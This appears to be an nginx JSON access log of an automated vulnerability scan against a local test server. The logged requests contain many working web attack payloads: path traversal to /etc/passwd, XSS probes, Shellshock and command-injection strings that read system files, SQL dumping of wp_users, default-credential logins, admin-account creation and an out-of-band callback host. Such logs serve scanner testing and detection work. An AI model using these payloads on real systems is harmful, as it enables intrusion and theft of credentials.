/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\x5C0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/oauth2/..;/ccversion/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/17 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redir=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=ca2u0eosmpv1jhs80ca0mrri3n9ferypu.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search?search_key=%7B%7B1337*1338%7D%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/29N5mB2waQwlHW8OmFaTsTKUr5t.php&data=HACKERMAN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/backend1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x22content\x22: \x22include:\x5Cn remote: http://127.0.0.1:9100/test.yml\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /b/l.e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/cask/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/18 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=dbpJV0&adminpassword=L4hbdH&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/29N5mB2waQwlHW8OmFaTsTKUr5t.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http/.....///.....///config/config_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.cnf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tool/log/c.php?strip_slashes=printf&host=nl+c.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/19 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/userinfo.php?UID=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/deployment.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sessions/new HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test-cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 